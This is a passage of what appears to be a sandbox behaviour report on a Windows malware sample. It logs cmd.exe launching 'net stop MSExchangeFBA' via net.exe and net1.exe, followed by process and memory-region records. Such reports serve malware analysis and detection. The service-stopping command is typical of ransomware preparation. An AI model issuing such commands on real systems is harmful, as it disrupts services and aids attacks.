_String2="MKDIR") returned 1 [0136.210] _wcsicmp (_String1="net", _String2="RD") returned -4 [0136.210] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0136.210] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0136.210] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0136.210] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0136.210] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0136.210] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0136.210] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0136.210] _wcsicmp (_String1="net", _String2="VER") returned -8 [0136.210] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0136.210] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0136.210] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0136.210] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0136.210] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0136.210] _wcsicmp (_String1="net", _String2="START") returned -5 [0136.210] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0136.210] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0136.210] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0136.210] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0136.210] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0136.210] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0136.210] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0136.210] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0136.210] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0136.210] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0136.210] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0136.210] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0136.210] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0136.210] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0136.210] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0136.210] _wcsicmp (_String1="net", _String2="CD") returned 11 [0136.210] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0136.210] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0136.210] _wcsicmp (_String1="net", _String2="REN") returned -4 [0136.210] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0136.210] _wcsicmp (_String1="net", _String2="SET") returned -5 [0136.210] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0136.210] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0136.210] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0136.210] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0136.210] _wcsicmp (_String1="net", _String2="MD") returned 1 [0136.211] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0136.211] _wcsicmp (_String1="net", _String2="RD") returned -4 [0136.211] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0136.211] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0136.211] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0136.211] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0136.211] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0136.211] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0136.211] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0136.211] _wcsicmp (_String1="net", _String2="VER") returned -8 [0136.211] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0136.211] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0136.211] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0136.211] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0136.211] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0136.211] _wcsicmp (_String1="net", _String2="START") returned -5 [0136.211] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0136.211] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0136.211] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0136.211] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0136.211] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0136.211] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0136.211] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0136.211] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0136.211] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0136.211] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0136.211] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0136.211] _wcsicmp (_String1="net", _String2="IF") returned 5 [0136.211] _wcsicmp (_String1="net", _String2="REM") returned -4 [0136.211] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0136.212] SetErrorMode (uMode=0x0) returned 0x0 [0136.212] SetErrorMode (uMode=0x1) returned 0x0 [0136.212] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x44305d0, lpFilePart=0x38f21c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x38f21c*="Desktop") returned 0x1d [0136.212] SetErrorMode (uMode=0x0) returned 0x1 [0136.212] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0136.212] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.221] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.221] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.221] GetConsoleTitleW (in: lpConsoleTitle=0x38f49c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.221] InitializeProcThreadAttributeList (in: lpAttributeList=0x38f3c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x38f3ac | out: lpAttributeList=0x38f3c8, lpSize=0x38f3ac) returned 1 [0136.221] UpdateProcThreadAttribute (in: lpAttributeList=0x38f3c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x38f3b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x38f3c8, lpPreviousValue=0x0) returned 1 [0136.221] GetStartupInfoW (in: lpStartupInfo=0x38f400 | out: lpStartupInfo=0x38f400*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.222] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.223] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0136.224] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeFBA", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x38f350*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeFBA", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x38f39c | out: lpCommandLine="net stop MSExchangeFBA", lpProcessInformation=0x38f39c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xeb8, dwThreadId=0xf10)) returned 1 [0136.232] CloseHandle (hObject=0xa4) returned 1 [0136.232] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0136.232] GetEnvironmentStringsW () returned 0x4439ec8* [0136.232] FreeEnvironmentStringsA (penv="=") returned 1 [0136.232] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0136.403] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x38f334 | out: lpExitCode=0x38f334*=0x2) returned 1 [0136.403] CloseHandle (hObject=0xa8) returned 1 [0136.403] _vsnwprintf (in: _Buffer=0x38f41c, _BufferCount=0x13, _Format="%08X", _ArgList=0x38f33c | out: _Buffer="00000002") returned 8 [0136.403] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0136.403] GetEnvironmentStringsW () returned 0x443b3a8* [0136.403] FreeEnvironmentStringsA (penv="=") returned 1 [0136.403] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0136.403] GetEnvironmentStringsW () returned 0x443b3a8* [0136.403] FreeEnvironmentStringsA (penv="=") returned 1 [0136.403] DeleteProcThreadAttributeList (in: lpAttributeList=0x38f3c8 | out: lpAttributeList=0x38f3c8) [0136.403] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.403] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0136.404] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.404] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0136.404] _get_osfhandle (_FileHandle=0) returned 0x38 [0136.404] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0136.404] SetConsoleInputExeNameW () returned 0x1 [0136.404] GetConsoleOutputCP () returned 0x1b5 [0136.404] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0136.404] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.404] exit (_Code=2) Thread: id = 626 os_tid = 0xf0c Process: id = "202" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x11f59000" os_pid = "0xee4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "201" os_parent_pid = "0xe74" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10125 start_va = 0x7f808000 end_va = 0x7f808fff entry_point = 0x0 region_type = private name = "private_0x000000007f808000" filename = "" Region: id = 10126 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10127 start_va = 0x2807580000 end_va = 0x280759ffff entry_point = 0x0 region_type = private name = "private_0x0000002807580000" filename = "" Region: id = 10128 start_va = 0x28075a0000 end_va = 0x28075b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000028075a0000" filename = "" Region: id = 10129 start_va = 0x28075c0000 end_va = 0x28075fffff entry_point = 0x0 region_type = private name = "private_0x00000028075c0000" filename = "" Region: id = 10130 start_va = 0x7df5ffc00000 end_va = 0x7ff5ffbfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc00000" filename = "" Region: id = 10131 start_va = 0x7ff6c3e90000 end_va = 0x7ff6c3eb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3e90000" filename = "" Region: id = 10132 start_va = 0x7ff6c3eba000 end_va = 0x7ff6c3ebafff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3eba000" filename = "" Region: id = 10133 start_va = 0x7ff6c3ebe000 end_va = 0x7ff6c3ebffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ebe000" filename = "" Region: id = 10134 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 10135 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10136 start_va = 0x2807580000 end_va = 0x280758ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002807580000" filename = "" Region: id = 10137 start_va = 0x2807590000 end_va = 0x2807596fff entry_point = 0x0 region_type = private name = "private_0x0000002807590000" filename = "" Region: id = 10138 start_va = 0x2807600000 end_va = 0x28076bdfff entry_point = 0x2807600000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10139 start_va = 0x28076c0000 end_va = 0x28077bffff entry_point = 0x0 region_type = private name = "private_0x00000028076c0000" filename = "" Region: id = 10140 start_va = 0x28077c0000 end_va = 0x28077fffff entry_point = 0x0 region_type = private name = "private_0x00000028077c0000" filename = "" Region: id = 10141 start_va = 0x2807800000 end_va = 0x2807800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002807800000" filename = "" Region: id = 10142 start_va = 0x2807810000 end_va = 0x2807816fff entry_point = 0x0 region_type = private name = "private_0x0000002807810000" filename = "" Region: id = 10143 start_va = 0x2807820000 end_va = 0x2807820fff entry_point = 0x0 region_type = private name = "private_0x0000002807820000" filename = "" Region: id = 10144 start_va = 0x2807830000 end_va = 0x2807830fff entry_point = 0x0 region_type = private name = "private_0x0000002807830000" filename = "" Region: id = 10145 start_va = 0x2807870000 end_va = 0x280787ffff entry_point = 0x0 region_type = private name = "private_0x0000002807870000" filename = "" Region: id = 10146 start_va = 0x2807880000 end_va = 0x2807a07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002807880000" filename = "" Region: id = 10147 start_va = 0x2807a10000 end_va = 0x2807b90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002807a10000" filename = "" Region: id = 10148 start_va = 0x2807ba0000 end_va = 0x2808f9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002807ba0000" filename = "" Region: id = 10149 start_va = 0x7ff6c3d90000 end_va = 0x7ff6c3e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3d90000" filename = "" Region: id = 10150 start_va = 0x7ff6c3ebc000 end_va = 0x7ff6c3ebdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ebc000" filename = "" Region: id = 10151 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 10152 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 10153 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10154 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10155 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 10156 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10157 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10158 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10159 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10160 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10161 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10162 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 10163 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 10164 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 623 os_tid = 0xb20 Thread: id = 624 os_tid = 0xf08 Thread: id = 625 os_tid = 0xf00 Process: id = "203" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x11e93000" os_pid = "0xeb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "201" os_parent_pid = "0xe74" cmd_line = "net stop MSExchangeFBA" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10178 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 10179 start_va = 0x8b0000 end_va = 0x48affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 10180 start_va = 0x48b0000 end_va = 0x48cffff entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 10181 start_va = 0x48d0000 end_va = 0x48d1fff entry_point = 0x0 region_type = private name = "private_0x00000000048d0000" filename = "" Region: id = 10182 start_va = 0x48e0000 end_va = 0x48f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048e0000" filename = "" Region: id = 10183 start_va = 0x4900000 end_va = 0x493ffff entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 10184 start_va = 0x4940000 end_va = 0x49bffff entry_point = 0x0 region_type = private name = "private_0x0000000004940000" filename = "" Region: id = 10185 start_va = 0x49c0000 end_va = 0x49c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049c0000" filename = "" Region: id = 10186 start_va = 0x49d0000 end_va = 0x49d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049d0000" filename = "" Region: id = 10187 start_va = 0x49e0000 end_va = 0x49e1fff entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 10188 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10189 start_va = 0x7f760000 end_va = 0x7f782fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f760000" filename = "" Region: id = 10190 start_va = 0x7f787000 end_va = 0x7f787fff entry_point = 0x0 region_type = private name = "private_0x000000007f787000" filename = "" Region: id = 10191 start_va = 0x7f78b000 end_va = 0x7f78dfff entry_point = 0x0 region_type = private name = "private_0x000000007f78b000" filename = "" Region: id = 10192 start_va = 0x7f78e000 end_va = 0x7f78efff entry_point = 0x0 region_type = private name = "private_0x000000007f78e000" filename = "" Region: id = 10193 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10194 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10195 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10196 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10197 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10198 start_va = 0x4a50000 end_va = 0x4a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a50000" filename = "" Region: id = 10199 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10200 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10201 start_va = 0x4c40000 end_va = 0x4d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 10202 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 627 os_tid = 0xf10 Thread: id = 628 os_tid = 0xf14 Process: id = "204" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x11d50000" os_pid = "0xec0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "203" os_parent_pid = "0xeb8" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeFBA" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10203 start_va = 0xa60000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 10204 start_va = 0xa80000 end_va = 0xa81fff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 10205 start_va = 0xa90000 end_va = 0xaa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 10206 start_va = 0xab0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 10207 start_va = 0xaf0000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id 